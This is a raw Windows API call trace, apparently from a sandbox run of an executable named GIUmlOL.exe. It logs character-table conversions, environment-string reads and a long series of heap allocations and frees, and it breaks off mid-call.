\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0166.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0166.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0166.856] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0166.856] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0166.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0166.856] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0166.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1000) returned 0x5a70f0 [0166.857] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0166.857] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0166.857] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0166.858] AreFileApisANSI () returned 1 [0166.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0166.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd0) returned 0x594400 [0166.858] GetEnvironmentStringsW () returned 0x5a8100* [0166.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4e6) returned 0x5a8ae0 [0166.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x5a8ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0166.858] FreeEnvironmentStringsW (penv=0x5a8100) returned 1 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x118) returned 0x59a350 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1f) returned 0x59b440 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x594fa0 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x31) returned 0x594fe0 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5a0540 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x31) returned 0x595020 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x595060 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x59b860 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd) returned 0x599900 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1d) returned 0x59b260 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x31) returned 0x593ec0 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x15) returned 0x594090 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17) returned 0x592600 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x593f00 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x69) returned 0x593f20 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3e) returned 0x5a0310 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1d) returned 0x59b8f0 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x5a0040 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x59ba20 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x59ba40 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1b) returned 0x59b9b0 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x59b800 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x29) returned 0x5a8350 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x59b620 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x6b) returned 0x59ba60 [0166.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17) returned 0x59bae0 [0166.859] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xf) returned 0x598d00 [0166.859] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x16) returned 0x598d20 [0166.859] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a) returned 0x5a86d0 [0166.859] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x29) returned 0x5a8850 [0166.859] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a9200 [0166.859] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x21) returned 0x59b4d0 [0166.859] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x16) returned 0x5a92e0 [0166.859] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x22) returned 0x59b500 [0166.859] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a9240 [0166.859] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8ae0 | out: hHeap=0x590000) returned 1 [0166.859] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa3a7) returned 0x5a93e0 [0166.861] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x59b6e0 [0166.861] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa3a7) returned 0x5b3790 [0166.862] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93e0 | out: hHeap=0x590000) returned 1 [0166.862] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xfef7) returned 0x5bdb40 [0167.011] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5a0e00 [0167.011] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xfef7) returned 0x5cda40 [0167.013] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59b6e0 | out: hHeap=0x590000) returned 1 [0167.013] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdb40 | out: hHeap=0x590000) returned 1 [0167.014] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x450) returned 0x5a8910 [0167.014] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x450) returned 0x5dd940 [0167.014] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.014] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1ea7) returned 0x5ddda0 [0167.015] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xf40) returned 0x5a93e0 [0167.016] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x7a0) returned 0x5aa330 [0167.016] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ddda0 | out: hHeap=0x590000) returned 1 [0167.016] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93e0 | out: hHeap=0x590000) returned 1 [0167.016] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xbf0) returned 0x5a93e0 [0167.016] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.016] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aa330 | out: hHeap=0x590000) returned 1 [0167.016] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x640) returned 0x5a8910 [0167.016] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1247) returned 0x5dd940 [0167.016] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93e0 | out: hHeap=0x590000) returned 1 [0167.016] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.016] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x520) returned 0x5a8910 [0167.016] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1b56) returned 0x5a93e0 [0167.016] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.016] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.016] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8a0) returned 0x5dd940 [0167.016] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28ed) returned 0x5aaf40 [0167.017] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93e0 | out: hHeap=0x590000) returned 1 [0167.017] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.017] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x550) returned 0x5a8910 [0167.017] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.017] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2537) returned 0x5dd940 [0167.017] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x12b7) returned 0x5a93e0 [0167.017] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x950) returned 0x5ad840 [0167.018] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.018] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93e0 | out: hHeap=0x590000) returned 1 [0167.018] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x3d4f) returned 0x5ae1a0 [0167.018] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aaf40 | out: hHeap=0x590000) returned 1 [0167.018] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ad840 | out: hHeap=0x590000) returned 1 [0167.018] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2377) returned 0x5dd940 [0167.018] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x11d7) returned 0x5b1f00 [0167.019] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8e0) returned 0x5a93e0 [0167.019] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.019] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b1f00 | out: hHeap=0x590000) returned 1 [0167.019] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93e0 | out: hHeap=0x590000) returned 1 [0167.019] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5b0) returned 0x5a8910 [0167.019] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.019] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x640) returned 0x5a8910 [0167.019] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5be2) returned 0x5bdb40 [0167.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ae1a0 | out: hHeap=0x590000) returned 1 [0167.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.020] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x890) returned 0x5dd940 [0167.021] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.021] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xac0) returned 0x5dd940 [0167.021] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.021] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x59b950 [0167.021] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x960) returned 0x5dd940 [0167.021] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x960) returned 0x5de2b0 [0167.021] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.021] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x460) returned 0x5a8910 [0167.021] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xe0f) returned 0x5dec20 [0167.021] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5de2b0 | out: hHeap=0x590000) returned 1 [0167.021] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.021] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c17) returned 0x5c3730 [0167.021] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xe00) returned 0x5dd940 [0167.022] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x700) returned 0x5c5350 [0167.022] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c3730 | out: hHeap=0x590000) returned 1 [0167.022] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.022] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x153d) returned 0x5c3730 [0167.022] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dec20 | out: hHeap=0x590000) returned 1 [0167.022] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c5350 | out: hHeap=0x590000) returned 1 [0167.022] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2277) returned 0x5dd940 [0167.022] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1157) returned 0x5c4c80 [0167.022] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8a0) returned 0x5c5de0 [0167.023] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.023] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c4c80 | out: hHeap=0x590000) returned 1 [0167.023] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1fc7) returned 0x5dd940 [0167.023] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c3730 | out: hHeap=0x590000) returned 1 [0167.023] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c5de0 | out: hHeap=0x590000) returned 1 [0167.023] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1657) returned 0x5c3730 [0167.023] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xb20) returned 0x5c4d90 [0167.023] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x590) returned 0x5df910 [0167.023] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c3730 | out: hHeap=0x590000) returned 1 [0167.023] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c4d90 | out: hHeap=0x590000) returned 1 [0167.023] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2f96) returned 0x5c3730 [0167.024] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.024] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5df910 | out: hHeap=0x590000) returned 1 [0167.024] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2b47) returned 0x5c66d0 [0167.024] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x15b7) returned 0x5dd940 [0167.024] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xad0) returned 0x5def00 [0167.025] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c66d0 | out: hHeap=0x590000) returned 1 [0167.025] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.025] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5def00 | out: hHeap=0x590000) returned 1 [0167.025] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2697) returned 0x5c66d0 [0167.025] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1367) returned 0x5dd940 [0167.026] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9a0) returned 0x5decb0 [0167.026] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c66d0 | out: hHeap=0x590000) returned 1 [0167.026] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0167.026] RtlAllocateHeap 